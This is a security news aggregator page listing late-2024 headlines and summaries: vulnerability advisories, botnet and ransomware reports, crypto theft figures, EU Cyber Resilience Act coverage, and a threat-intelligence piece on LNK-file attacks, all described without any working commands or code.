Security News

Learn how to use JSON Web Tokens (JWT) securely in your Node.js applications. I''ll cover the basics of JWT and share best practices to avoid common security mistakes.

by Node.js Security

The Cyber Statecraft community and friends offers eight thoughts on the implications of the Salt Typhoon campaign based on what is known to date, what the campaign says about the last four years of cybersecurity policy, and where policymakers should focus in the months ahead. The post The Eight Body Problem: Exploring the Implications of Salt Typhoon  appeared first on DFRLab.

by DFRLab

KEY SUMMARY POINTS Krispy Kreme, the beloved doughnut chain, disclosed a data breach on December 11, 2024, in…

by Hackread

Cyberattacks against OT/ICS engineering workstations are widely underestimated, according to researchers who discovered malware designed to shut down Siemens workstation engineering processes.

by Dark Reading

Criminals are luring victims looking to download software and tricking them into running a malicious command.

by Malwarebytes Labs

Fortinet has patched CVE-2023-34990 in its Wireless LAN Manager (FortiWLM), which combined with CVE-2023-48782 could allow for unauthenticated remote code execution (RCE) and the ability to read all log files.

by Dark Reading

The Auto Data Privacy and Autonomy Act would require automakers to create opt-in mechanisms for vehicle data collection and would bar manufacturers from sharing, selling or leasing customer data without explicit consent

by The Record

FHE adoption will be driven by collaboration, open standards, and industry-wide efforts to address privacy and security challenges, including law enforcement''s embrace of encryption for national security.

by ITPro Today

With the latest OS versions, you can generate an AirTag link to help airline personnel track down your missing luggage. Apple says privacy safeguards are built in.

by ZDNET Security

Talk in Silicon Valley is focused on agents — artificial intelligence that can handle multistep workplace chores. What does that mean for us?

by ITPro Today

Beginning December 11, customers started reporting “suspicious behavior” on their Session Smart Routers, Juniper says, and they had one thing in common: They were still using the factory-set passwords on the devices.

by The Record

FBI says malware operation is building a botnet out of smart cameras and video boxes.

by SC Media

Threat actors have been observed uploading malicious typosquats of legitimate npm packages such as typescript-eslint and @types/node that have racked up thousands of downloads on the package registry. The counterfeit versions, named @typescript_eslinter/eslint and types-node, are engineered to download a trojan and retrieve second-stage payloads, respectively. ""While typosquatting attacks are

by The Hacker News

AI super agents could revolutionize app ecosystems by providing tailored services across platforms, offering a more convenient, user-friendly experience while also transforming app development.

by ITPro Today

Juniper Networks is warning that Session Smart Router (SSR) products with default passwords are being targeted as part of a malicious campaign that deploys the Mirai botnet malware. The company said it''s issuing the advisory after ""several customers"" reported anomalous behavior on their Session Smart Network (SSN) platforms on December 11, 2024. ""These systems have been infected with the Mirai

by The Hacker News

In the last newsletter of the year, Thorsten recalls his tech-savvy gift to his family and how we can all incorporate cybersecurity protections this holiday season.

by Cisco Talos Blog

Cisco Talos’ Vulnerability Research team recently disclosed three out-of-bounds read vulnerabilities in Adobe Acrobat Reader, and two use-after-free vulnerabilities in Foxit Reader.  These vulnerabilities exist in Adobe Acrobat Reader and Foxit Reader, two of the most popular and feature-rich PDF readers on the market. The vulnerabilities

by Cisco Talos Blog

Some of the messages in your Gmail inbox this season are not very nice. Google provides guidance on protecting yourself from the naughty ones.

by ZDNET Security

Check Point Software Technologies Ltd. has announced that it has been named as a Leader in the 2024 Gartner® Magic Quadrant™ for Email Security Platforms (ESP). Check Point provides email security through Harmony Email Collaboration, protecting email and collaboration apps from advanced threats, seamlessly integrating with the Check Point Infinity Platform for unified protection. As […] The post Inaugural Gartner Magic Quadrant for Email Security Platforms Names Leading Cyber Orgs appeared first on IT Security Guru.

by IT Security Guru

A newly discovered vulnerability, CVE-2024-53677, in the aging Apache framework is going to cause major headaches for IT teams, since patching isn''t enough to fix it.

by Dark Reading

TP-Link is being investigated for alleged predatory pricing practices, which may be driven by ulterior motives.

by Malwarebytes Labs

SandboxAQ have announced a round of more than $300 million from Fred Alger Management, LLC, T. Rowe Price Associates, Inc., Mumtalakat, Parkway Venture Capital, Breyer Capital, Rizvi Traverse, S32, US Innovative Technology Fund, Ava Investments, Eric Schmidt, Marc Benioff, David Siegel, Yann LeCun, IQT, and other prominent investors. The funding round valued the company at […] The post SandboxAQ Announces Over $300 Million of Funding, Valued at $5.3bn appeared first on IT Security Guru.

by IT Security Guru

Modern identity verification (IDV) approaches aim to connect digital credentials and real-world identity without sacrificing usability.

by Dark Reading

Telegram’s “similar channels” feature, introduced last year, recommends extremist channels even when users browse channels on nonpolitical topics such as celebrities or technology, according to a report by the U.S. nonprofit legal advocacy organization Southern Poverty Law Center (SPLC).

by The Record

Non-human identities authenticate machine-to-machine communication. The big challenge now is to secure their elements and processes — before attackers can intercept.

by Dark Reading

Windows 11 officially requires a Trusted Platform Module. Here''s what it does and how you can work around that requirement if your old PC doesn''t have one.

by ZDNET Security

Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.

by Krebs on Security

The BadBox Android malware botnet has grown to over 192,000 infected devices worldwide despite a recent sinkhole operation that attempted to disrupt the operation in Germany. [...]

by BleepingComputer

by SC Media

Seemingly innocent "white pages," including an elaborate Star Wars-themed site, are bypassing Google''s malvertising filters, showing up high in search results to lure users to second-stage phishing sites.

by Dark Reading

Benchmarking is all about taking back control – you’re measuring to gain complete awareness of your development teams’ security skills and practices. The post How to Implement Impactful Security Benchmarks for Software Development Teams appeared first on SecurityWeek.

by SecurityWeek

The LockBit ransomware group will soon launch a comeback with the planned release of LockBit 4.0 in February 2025, Cyble dark web researchers reported in a note to clients today. The launch of LockBit 4.0 will come almost a year after a global law enforcement action disrupted its operations and led to the recovery of nearly 7,000 decryption keys. RansomHub has since emerged as the most active ransomware group. The Cyble note to clients included an image of LockBit’s announcement, edited to remove profanity: [caption id=""attachment_99732"" align=""aligncenter"" width=""400""] LockBit announces plans for LockBit 4.0 release (Source: Cyble)[/caption] “Want a lamborghini, ferrari and lots of ... girls?” the group’s announcement said. “Sign up and start your pentester billionaire journey in 5 minutes with us.” Can LockBit Make a Comeback? It remains to be seen if LockBit can successfully mount a comeback after being hit by significant takedowns, arrests and the release of decryption keys. It has been more than two years since the release of LockBit 3.0, and as LockBit was said to be developing the 4.0 version at the time of the law enforcement actions, significant changes likely would have been required if law enforcement obtained access to any source code. Cyble researchers noted that “it is uncertain whether LockBit will regain traction, as the group has faced declining credibility amidst competition from other RaaS groups, such as RansomHub, which currently dominate the ransomware landscape.” The official release of the LockBit 4.0 Ransomware-as-a-Service (RaaS) program is set for February 3, 2025, Cyble noted, and the group included keys for accessing their dark leak site (DLS). LockBit 4.0 Will Join Growing RaaS Services The RaaS model has become increasingly popular with ransomware groups, selling tools, playbooks and infrastructure in exchange for a share of the profits. And with LockBit competing against versions of its own ransomware built on leaked source code, the group appears to face significant hurdles in staging a comeback. Threat researchers will also be watching to see if LockBit changes its targets or regions to avoid attracting international law enforcement attention. A 2022 attack on the Toronto Hospital for Sick Children was particularly ill-advised, and led to an apology from LockBit along with a free decryptor.

by The Cyber Express

Proceeds from the latest round will be used to accelerate the company’s growth into key markets such as the United States and Europe, alongside other high-growth regions.

by SC Media

Fortinet has issued an advisory for a now-patched critical security flaw impacting Wireless LAN Manager (FortiWLM) that could lead to disclosure of sensitive information. The vulnerability, tracked as CVE-2023-34990, carries a CVSS score of 9.6 out of a maximum of 10.0. ""A relative path traversal [CWE-23] in FortiWLM may allow a remote unauthenticated attacker to read sensitive files,"" the

by The Hacker News

The flaw circumvents AMD’s Secure Encrypted Virtualization, which encrypts virtual machine memory to safeguard cloud customer data, by tampering with the Serial Presence Detect chip on memory modules using hardware that can cost under $10.

by SC Media

The draft of the long-awaited update to the NCIRP outlines the efforts, mechanisms, involved parties, and decisions the US government will use in response to a large-scale cyber incident.

by Dark Reading

According to the report, such accounts, which often use default passwords and lack proper monitoring -- exposing cloud-native environments to significant risks -- now constitute over 90% of Active Directory identities.

by SC Media

The product, which is now in beta for Rubrik Enterprise Edition and cloud customers, aims to address challenges associated with prolonged business outages during cyberattacks, reducing the traditional recovery timeline from days or weeks to moments.

by SC Media

​Microsoft is investigating a known issue randomly triggering ""Product Deactivated"" errors for customers using Microsoft 365 Office apps. [...]

by BleepingComputer

DeviceTRUST offers solutions that focus on real-time contextual access for virtual desktop infrastructure and desktop as a service, allowing enterprises to secure digital workspaces by continuously monitoring device posture, user location, and other access contexts.

by SC Media

Learn from this real-life scenario where Darktrace detected a ProxyLogon vulnerability and took action to protect Exchange servers. Read more here.

by Darktrace

Employing tactics such as living-off-the-land techniques and targeting both Linux and Windows systems, the group is suspected to include former affiliates of LockBit and BlackCat.

by SC Media

Juniper Networks warns that a Mirai botnet is targeting SSR devices with default passwords after unusual activity was reported on December 11, 2024. Juniper Networks is warning that a Mirai botnet is targeting Session Smart Router (SSR) products with default passwords. Multiple customers reported anomalous activity on their Session Smart Network (SSN) platforms on December […]

by Security Affairs

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Binding Operational Directive (BOD) 25-01, ordering federal civilian agencies to secure their cloud environments and abide by Secure Cloud Business Applications (SCuBA) secure configuration baselines. ""Recent cybersecurity incidents highlight the significant risks posed by misconfigurations and weak security controls,

by The Hacker News

Adam Meyers, senior vice president of counter-adversary operations at CrowdStrike says manual attacks, which involve direct interaction with compromised systems rather than relying on malware or automated tools, are gaining traction among cybercriminals for their effectiveness and elusiveness.

by SC Media

A sudden disruption of a major phishing-as-a-service provider leads to the rise of another…that looks very familiar

by Sophos News

$2.2 billion worth of cryptocurrency was stolen from various platforms in 2024, Chainalysis’ 2025 Crypto Crime Report has revealed. Of that sum, $1.34 billion was stolen by North Korea-affiliated hackers, across 47 hacking incidents (out of 303). Most targeted organizations Between 2021 and 2023, decentralized finance (DeFi) platforms were the primary targets of crypto hacks, but in Q2 and Q3 2024, centralized services were the most targeted. Funds stolen between January and November 2024 – … More → The post Cryptocurrency hackers stole $2.2 billion from platforms in 2024 appeared first on Help Net Security.

by Help Net Security

Many people have heard of ChatGPT, Gemini, Bart, Claude, Llama, or other artificial intelligence (AI) assistants at this point. These are all implementations of what are known as large language […] The post Pitting AI Against AI: Using PyRIT to Assess Large Language Models (LLMs)  appeared first on Black Hills Information Security.

by Black Hills Information Security

Rostislav Panev, accused of working with the LockBit gang as a developer, has been in Israeli custody since August, and the U.S. wants to extradite him, according to a news report.

by The Record

Sonic, the leading gaming SVM on Solana, and Injective, a WASM-based L1 network, today announced that they will…

by Hackread

A balance of rigorous supplier validation, purposeful data exposure, and meticulous preparation is key to managing and mitigating risk.

by Dark Reading

The Dutch Data Protection Authority (DPA) on Wednesday fined video on-demand streaming service Netflix €4.75 million ($4.93 million) for not giving consumers enough information about how it used their data between 2018 and 2020. An investigation launched by the DPA in 2019 found that the tech giant did not inform customers clearly enough in its privacy statement about what it does with the data

by The Hacker News

The vulnerability, tracked as CVE-2024-44131, was discovered in the FileProvider component and has been fixed in iOS 18, iPadOS 18, and macOS Sequoia 15 through improved validation of symbolic links.

by SC Media

Russia''s internet regulator, Roskomnadzor (RKN), has issued a directive requiring Internet Service Providers (ISPs) to supply information that could identify users accessing blocked content via VPNs. The controversial move, part of a broader effort to control digital traffic and combat unauthorized access to restricted sites, has sparked debates over privacy and operational feasibility. The draft … The post Russian Government Orders ISPs to Hand Over Names of VPN Users appeared first on CyberInsider.

by Cyber Insider

Microsoft has acknowledged a critical issue affecting the Auto HDR feature on devices running Windows 11 version 24H2. The feature, designed to enhance gaming visuals by converting SDR (Standard Dynamic Range) content to HDR (High Dynamic Range), may cause games to display incorrect colors or stop responding altogether. The company has implemented a compatibility hold … The post Microsoft Says Auto HDR in Windows 11 24H2 Causes Game Freezes appeared first on CyberInsider.

by Cyber Insider

Researchers at Chainalysis tallied up the known thefts from cryptocurrency platforms in 2024, pegging the total at $2.2 billion, the fifth year in a row that the number topped $1 billion.

by The Record

The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed that a threat actor it tracks as UAC-0125 is leveraging Cloudflare Workers service to trick military personnel in the country into downloading malware disguised as Army+, a mobile app that was introduced by the Ministry of Defence back in August 2024 in an effort to make the armed forces go paperless. Users who visit the

by The Hacker News

GitHub, the premier platform for open-source software collaboration, faces a growing issue of fake star campaigns, which artificially inflate repository popularity metrics. A recent study conducted by researchers from Carnegie Mellon University and North Carolina State University reveals how this trend misleads developers and opens pathways for malware proliferation. Dangers of fake GitHub stars Stars … The post GitHub Plagued by 4.5 Million Fake Stars Problem Misleading Users appeared first on CyberInsider.

by Cyber Insider

The move to urge Americans to use end-to-end encrypted apps comes as China-backed gangs are hacking into phone and internet giants. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

As threats evolve, SOC teams must adapt their operations. With Cloudflare’s holistic approach to managing user-based risk, SOC teams can operate more efficiently and reduce the likelihood of a breach.

by Cloudflare

With 2025 on the horizon, it’s important to reflect on the developments and various setbacks that happened in cybersecurity this past year. While there have been many improvements in security technologies and growing awareness of emerging cybersecurity threats, 2024 was also a hard reminder that the ongoing fight against cyber criminals is far from over. […] The post 2024 roundup: Top data breach stories and industry trends appeared first on Security Intelligence.

by Security Intelligence

A malicious Android spyware application named ''BMI CalculationVsn'' was discovered on the Amazon Appstore, masquerading as a simple health tool but stealing data from infected devices in the background. [...]

by BleepingComputer

Fortinet warns of a patched FortiWLM vulnerability that could allow admin access and sensitive information disclosure. Fortinet warned of a now-patched Wireless LAN Manager (FortiWLM) vulnerability, tracked as CVE-2023-34990 (CVSS score of 9.6), that could lead to admin access and sensitive information disclosure. “A relative path traversal [CWE-23] in FortiWLM may allow a remote, unauthenticated […]

by Security Affairs

In light of recent Chinese hacking into US telecom infrastructure, CISA has released guidance on protecting mobile communications. The post CISA Releases Mobile Security Guidance After Chinese Telecom Hacking appeared first on SecurityWeek.

by SecurityWeek

Learn how continuous threat exposure management (CTEM) boosts cybersecurity with proactive strategies to assess, manage, and reduce risks. The post CTEM Defined: The Fundamentals of Continuous Threat Exposure Management appeared first on NetSPI.

by NetSPI

Protect yourself from sophisticated phishing attacks that leverage Google Calendar to steal your personal information.

by Hackread

Juniper Networks has warned customers of Mirai malware attacks targeting and infecting Session Smart routers using default credentials. [...]

by BleepingComputer

NETSCOUT updates its Arbor Edge Defense (AED) and Arbor Enterprise Manager (AEM) products as part of its Adaptive DDoS Protection Solution to combat AI-enabled DDoS threats and protect critical IT infrastructure. DDoS threats and protect critical IT infrastructure. NETSCOUT’s DDoS Threat Intelligence Report noted that application-layer and volumetric attacks have increased by over 43% and 30%, respectively. DDoS-for-hire services have also increased in number and sophistication, making attacks easier to launch. The Cybersecurity & Infrastructure … More → The post NETSCOUT uses AI/ML technology to secure critical IT infrastructure appeared first on Help Net Security.

by Help Net Security

Raccoon Infostealer MaaS operator Mark Sokolovsky was sentenced to 60 months in prison in the US and agreed to pay over $910,000 in restitution. The post Ukrainian Raccoon Infostealer Operator Sentenced to Prison in US appeared first on SecurityWeek.

by SecurityWeek

Alongside the rising adoption and value of crypto assets, theft is also on the rise. This year, the total value of cryptocurrency stolen surged 21%, reaching a substantial $2.2 billion. And according to a Chainalysis report released on Thursday, more than half of this amount was stolen by North Korea-affiliated hacking groups. Earlier this year, […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a binding operational directive (BOD 25-01) requiring federal civilian agencies to secure their (Microsoft) cloud environments. About the CISA BOD 25-01 directive The Implementing Secure Practices for Cloud Services directive sets out three deadlines for the agencies: By February 21, 2025, they have to identify all cloud tenants within the scope of the directive and report to CISA. By April 25th, 2025, they must deploy … More → The post CISA orders federal agencies to secure their Microsoft cloud environments appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

Cisco has announced its intention to acquire threat detection company SnapAttack to boost Splunk security product capabilities.  The post Cisco to Acquire Threat Detection Company SnapAttack appeared first on SecurityWeek.

by SecurityWeek

Cybercriminals are using advanced techniques to target executives with mobile-specific phishing attacks.

by Hackread

Microsoft has added another Windows 11 24H2 upgrade block for systems with Dirac audio improvement software due to compatibility issues breaking sound output. [...]

by BleepingComputer

Fortinet has disclosed a critical vulnerability in Fortinet Wireless Manager (FortiWLM) that allows remote attackers to take over devices by executing unauthorized code or commands through specially crafted web requests. [...]

by BleepingComputer

In recent years, cyber attackers have continuously upgraded their tactics, exploiting a variety of tools and techniques to evade detection and compromise systems. One such trend that has caught the attention of security experts is the increasing use of malicious LNK files in conjunction with SSH commands. These files, often disguised as legitimate shortcuts, have become an effective weapon in the arsenals of threat actors (TAs), enabling them to infiltrate systems and deploy a wide range of malicious payloads. Cyble Research and Intelligence Labs (CRIL) has closely investigated this rising threat and found that, in 2024, the use of LNK files as an infection vector is on the rise. The Shift in Attack Vectors: LNK Files as an Entry Point In its investigation, CRIL identified a trend where attackers are increasingly using LNK files to infiltrate targeted systems. These shortcut files, typically designed to point to a specific application or location on a computer, are often disguised as innocuous documents or files to trick users into executing them. Once opened, they initiate a chain of malicious activities, leading to the deployment of more sophisticated malware and enabling cybercriminals to establish a foothold within the compromised environment. The growing use of LNK files as a delivery mechanism for cyberattacks is part of a broader shift in the tactics employed by threat actors. By leveraging these shortcut files, attackers aim to bypass traditional security defenses, including antivirus programs and endpoint detection and response (EDR) solutions. Living-Off-the-Land Binaries (LOLBins) and Evasion Techniques  One of the primary techniques utilized by attackers in these LNK-based campaigns is the use of Living-off-the-Land Binaries (LOLBins). These are trusted system binaries that are already present in the operating system and are typically used for legitimate purposes. However, when exploited by cybercriminals, they can serve as powerful tools for executing malicious commands without the need to deploy external malware. In many of these attacks, attackers leverage various LOLBins to download or execute additional malicious payloads, further advancing their attack chain.  While modern EDR solutions are designed to detect suspicious activities involving LOLBins, the sophistication of these attacks continues to evolve. Attackers have refined their methods to bypass detection, making it crucial for organizations to implement more advanced detection mechanisms that can identify malicious use of trusted system utilities.  SSH Commands in Malicious LNK Files: A New Layer of Sophistication  One of the more interesting developments observed in recent campaigns is the incorporation of SSH commands within malicious LNK files. Traditionally used for secure communication between systems, SSH commands have now been weaponized by attackers to establish persistent connections, execute malicious payloads, and maintain control over compromised systems.  CRIL''s research has uncovered several campaigns where SSH commands, specifically those using the Secure Copy Protocol (SCP), have been used within LNK files. SCP allows attackers to download malicious files from remote servers to a compromised system, where they are then executed to further the attack.  Once the file is downloaded, it is executed, advancing the attacker’s objectives. This technique is particularly concerning because the use of SSH for such operations is not common on Windows systems, allowing the activity to go undetected by traditional security systems. Exploiting PowerShell and CMD Through SSH  In addition to using SCP for file downloads, threat actors have also employed SSH commands to indirectly execute malicious PowerShell or CMD commands through the LNK file. These commands can be configured to load and execute additional payloads or exploit other system utilities.  One such attack observed by CRIL involved a malicious LNK file that used an SSH command to trigger a PowerShell script, which then called mshta.exe to download a malicious payload from a remote URL. The execution of the malicious PowerShell script led to the deployment of a harmful file on the compromised system.  Furthermore, attackers have also leveraged cmd.exe and rundll32 commands to load malicious DLL files and execute them, further complicating detection efforts. In one such case, the attackers used the LNK file to execute a series of commands that ultimately launched a PDF file containing a lure document, which, when opened, triggered the execution of malicious code.  Tactics Employed by Advanced Persistent Threat (APT) Groups  As the sophistication of these attacks continues to grow, APT groups are increasingly incorporating SSH-based techniques into their campaigns. These groups are known for their targeted and long-term cyber espionage activities, and their use of LNK files and SSH commands demonstrates their ongoing refinement of attack methods.   Notably, the Transparent Tribe, a well-known APT group, has been linked to the deployment of stealer malware via similar techniques. In these attacks, the malicious payloads are often compiled using Go, making them harder to detect and analyze.  The Need for Vigilance and Enhanced Detection  The combination of LNK files and SSH commands represents a significant threat to organizations worldwide. As attackers continue to refine their methods, it is essential for security teams to implement monitoring strategies and detection systems capable of identifying abnormal activities, such as the malicious use of trusted system binaries.  EDR solutions must evolve to detect the subtle signs of malicious SSH and SCP activity, especially in environments where SSH is not typically used. By closely monitoring the legitimate SSH utility and restricting its use to authorized personnel, organizations can reduce the risk of exploitation. Additionally, disabling unnecessary features, such as OpenSSH, on systems where they are not required, can help limit the attack surface. 

by The Cyber Express

Europe embarks on a new chapter in cybersecurity with the entry into force of the Cyber Resilience Act (CRA). This marks the first-ever EU legislation addressing cybersecurity across a broad range of digital products. The CRA will have far-reaching implications for everything from simple connected devices like baby monitors and smartwatches to more complex systems supporting critical infrastructure.   With mandatory cybersecurity requirements imposed on manufacturers and retailers, the Act promises to make Europe’s digital space safer, fostering resilience against cyber threats. The Cyber Resilience Act introduces harmonized rules for products containing digital elements, aiming to ensure high levels of cybersecurity standards throughout their entire lifecycle.  This means manufacturers and retailers must meet strict cybersecurity standards at every stage of the product''s journey—from design and production to maintenance and eventual disposal. The goal is to enhance transparency, reduce vulnerabilities, and strengthen overall security for products connected to or interacting with other networks and devices.  The CRA’s requirements apply to all products with digital components, with a few exclusions such as medical devices and aviation equipment. By December 2027, any product sold in the EU containing digital elements will need to meet these cybersecurity standards and bear the CE marking, signifying compliance. The CE marking is a symbol that indicates a product meets EU safety and regulatory standards, and for the first time, it will also assure consumers that the product adheres to stringent cybersecurity measures.  The Cyber Resilience Act (CRA) Will Impact All Economic Operators  The CRA targets all economic operators placing products with digital components on the European market, meaning it applies to manufacturers, importers, and retailers. Some of the key factors of the act are:   Additional Guidance for SMEs: Microenterprises and small businesses (SMEs) will receive extra guidance to help them comply with the Cyber Resilience Act (CRA) requirements.  Flexibility for Member States: While the CRA sets minimum cybersecurity standards, Member States have the flexibility to enforce stricter regulations where necessary.  Third-Party Assessments for High-Risk Products: Certain high-risk products, such as firewalls, intrusion detection systems, and cybersecurity tools, will undergo mandatory third-party assessments to ensure compliance with security standards, especially if they are critical to infrastructure or essential services.  Open-Source Software Exemption: Open-source software is not subject to the same strict CRA requirements as commercial products. It is only regulated under the CRA when supplied for commercial use.  Exemption for Non-Commercial Open-Source Software: Software developed by nonprofits or small businesses for non-commercial use is exempt from CRA requirements.  Requirements for Commercial Open-Source Software: Open-source software developed for commercial purposes must adhere to cybersecurity best practices under the CRA. However, it is not required to have a CE marking.  Cybersecurity Standards for Open-Source in Commercial Products: Manufacturers incorporating open-source software into their products must ensure these components meet cybersecurity standards, including regular updates and vulnerability management.  Strengthening Cybersecurity for Critical Infrastructure  The Cyber Resilience Act plays a crucial role in protecting Europe''s critical infrastructure. Digital products used by these services must meet established cybersecurity standards to avoid potential disruption from cyberattacks.   Security of Critical Infrastructure: The CRA ensures that products integrated into critical infrastructure, such as power grids and transportation systems, are secure by default.  Complementing Existing Regulations: The CRA complements existing regulations like the EU Cybersecurity Strategy and the NIS2 Directive, creating a unified framework for resilience across various sectors.  Sector-Specific Requirements: Some sectors have additional or specific requirements, with existing EU rules on medical devices and vehicles remaining unaffected by the CRA.  Consistency in Radio Equipment Regulations: The cybersecurity of radio equipment will continue to be governed by pre-existing regulations, ensuring consistency within the EU''s legislative framework.  Focus on Security Updates and Vulnerability Management: Manufacturers must provide security updates for their products throughout their lifespan, addressing vulnerabilities as they arise.  Support Periods for Products: The CRA mandates at least five years of security updates for most products, with longer support periods required for products with longer lifespans, such as industrial systems or hardware.  Vulnerability Reporting and Fixes: If a vulnerability is discovered, manufacturers must promptly inform users and fix the issue.  Incident Reporting Requirements: If a product''s security is compromised, manufacturers must notify relevant authorities and affected users, including mandatory reporting to cybersecurity agencies like ENISA.  Ensuring Transparency and Market Compliance  Transparency is a critical element of the Cyber Resilience Act. The Act mandates that products with digital components must be assessed for conformity, with a special focus on those deemed to be higher risk.   Lifecycle Cybersecurity Assessments: Assessments will verify that products meet cybersecurity requirements throughout their lifecycle, ensuring manufacturers handle vulnerabilities responsibly and products are secure by default.  Market Surveillance and Compliance: The CRA provides a framework for market surveillance authorities to ensure that products meet cybersecurity standards. If a product poses significant cybersecurity risks or fails to comply with regulations, authorities can enforce corrective actions, including recalls or withdrawals.  CE Marking as Compliance Indicator: The CE marking will serve as the primary indicator of a product''s compliance with cybersecurity standards, helping consumers make informed purchasing decisions.  Harmonized Standards for Compliance: The CRA encourages the development of harmonized standards to simplify the conformity assessment process. Products meeting these standards will be presumed compliant, streamlining market entry and ensuring consistent security levels across the EU.  Cybersecurity Certifications: The EU Cybersecurity Certification Scheme (EUCC) will be an essential tool for manufacturers to demonstrate compliance with cybersecurity requirements for products sold within the EU.  Role of the European Commission: The Commission will adopt these cybersecurity standards and provide additional technical specifications as needed to support compliance.  Cybersecurity and the Digital Single Market  The CRA plays a pivotal role in the EU’s Digital Single Market, which aims to ensure the free flow of digital products and services while maintaining high standards of safety and security. By introducing the CE marking for compliant products, the CRA provides a unified approach that prevents the fragmentation of the digital market. Consumers will have confidence that the digital products they purchase are secure, reducing risks associated with cyberattacks and ensuring the integrity of Europe’s digital economy.  In this context, market surveillance authorities will work together to monitor compliance across Member States, while entities like ENISA and CSIRTs (Computer Security Incident Response Teams) will ensure that cybersecurity incidents and vulnerabilities are effectively reported and managed.  As the Cyber Resilience Act transitions into full effect by December 2027, Member States will provide support for small businesses and microenterprises to help them comply with the new cybersecurity requirements. This support could include regulatory sandboxes, training programs, and guidance to reduce the burden of compliance for smaller players in the market.   Additionally, financial aid may be made available to help reduce the costs of third-party conformity assessments, making it easier for smaller manufacturers to meet the high standards of the CRA.  Penalties for Non-Compliance  The Cyber Resilience Act (CRA) enforces penalties for non-compliance, emphasizing the importance of adhering to cybersecurity requirements within the European Union.   Penalties for Non-Compliance: Companies failing to meet the CRA''s obligations may face significant fines. Serious violations could result in fines of up to €15 million or 2.5% of the company''s worldwide annual turnover from the previous financial year, whichever is higher. For other breaches, fines could reach €10 million or 2% of annual turnover.  Fines for Misleading Information: Providing incorrect, incomplete, or misleading information to market surveillance authorities or notified bodies may incur fines of up to €5 million or 1% of the company’s worldwide turnover.  Penalty Structure: The penalties are designed to be effective, proportionate, and dissuasive, ensuring strong deterrents against non-compliance. Market surveillance authorities are responsible for enforcing these penalties and can take actions such as requiring corrective measures, restricting non-compliant products, or removing them from the market.  Role of Member States: Each Member State must establish rules for penalties and enforce them effectively, sharing information with other EU countries as necessary.  Factors in Determining Fines: Authorities will consider factors like the nature and severity of the infringement, its consequences, and the company’s size and market share when determining fines.  Combination of Fines and Corrective Actions: Administrative fines may be combined with other corrective measures to ensure that companies comply with cybersecurity standards and protect the digital ecosystem.  How Cyble, the award winning Cybersecurity firm, help you achieve compliance? The Cyber Resilience Act (CRA) marks an important milestone in enhancing cybersecurity across Europe, solidifying the EU’s position as a prominent player in the global effort to secure cyberspace. With mandatory requirements for digital products, a focus on transparency in vulnerability management, and a framework for market surveillance, the CRA ensures the safety and security of Europe’s interconnected digital ecosystem.  To better understand the complexities of compliance and upgrade your cybersecurity efforts, Cyble, a leading provider of threat intelligence solutions, offers powerful tools to help organizations be compliance-ready. Cyble’s flagship platform, Cyble Vision, utilizes AI, machine learning, and human intelligence to monitor and manage digital risks effectively. With features like continuous deep and dark web monitoring, attack surface management, and real-time alerts, Cyble empowers businesses to identify vulnerabilities, mitigate threats, and maintain compliance with the CRA’s stringent requirements.  By integrating Cyble’s solutions, organizations can ensure secure products, manage vulnerabilities, and provide timely updates, helping them meet the rigorous cybersecurity standards set by the CRA. Cyble’s proactive threat intelligence capabilities and real-time insights enable businesses to protect their digital assets, comply with regulatory obligations, reduce cyberattack risks, and enhance overall resilience in the digital environment.  The post Europe’s Cyber Resilience Act: A New Era of Cybersecurity for Digital Products  appeared first on Cyble.

by CYBLE

Legit Security announced enhancements to its secrets scanning product. Available as either a stand-alone product or as part of a broader ASPM platform, Legit released a new secrets dashboard for an integrated view of all findings and recovery actions taken to remediate secrets. In addition, Legit released new discovery and remediation capabilities for secrets found within developers’ personal GitHub repositories. Secrets – from API keys and tokens to credentials and PII – play a vital … More → The post Legit Security provides insights into the enterprise’s secrets posture appeared first on Help Net Security.

by Help Net Security

Fortinet has released patches for a critical-severity path traversal vulnerability in FortiWLM that was reported last year. The post Fortinet Patches Critical FortiWLM Vulnerability appeared first on SecurityWeek.

by SecurityWeek

Hear from Hostinger''s Head of SEO on how its outreach stays focused thanks to Hunter.io.

by The Hunter Blog

Kaspersky''s GERT experts describe an incident with initial access to enterprise infrastructures through a FortiClient EMS vulnerability that allowed SQL injections.

by Securelist

McDonald''s India exposed the personal information of customers and drivers due to security flaws impacting its APIs. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

As we step into 2025, the API landscape is undergoing a transformative shift, redefining how businesses innovate and scale. APIs are no longer just enablers of connectivity; they are the architects of ecosystems, powering everything from seamless automation to AI-driven services. The new year will prove to be a pivotal year for the API ecosystem […] The post What could the API Landscape look like in 2025? appeared first on IT Security Guru.

by IT Security Guru

Alphabet spinoff SandboxAQ has announced raising $300 million in funding at a valuation of $5.3 billion. The post SandboxAQ Raises $300 Million at $5.3 Billion Valuation  appeared first on SecurityWeek.

by SecurityWeek

A large-scale cybercriminal operation known as BADBOX is spreading pre-installed malware on Android-based devices, including smartphones, TVs, and tablets, sold through major retailers like Amazon, eBay, and AliExpress. Despite earlier attempts to dismantle the botnet, recent findings from Bitsight indicate that BADBOX remains active and larger than previously thought, compromising over 192,000 devices globally. BADBOX … The post BADBOX Malware Expands Global Reach, Infects 192,000 Devices appeared first on CyberInsider.

by Cyber Insider

Google has released a Chrome 131 update to patch multiple high-severity memory safety vulnerabilities, including three affecting the V8 JavaScript engine. The post Chrome 131 Update Patches High-Severity Memory Safety Bugs appeared first on SecurityWeek.

by SecurityWeek

Microsoft is now blocking Windows 11 24H2 upgrades on systems with Auto HDR enabled due to a compatibility issue that causes game freezes. [...]

by BleepingComputer

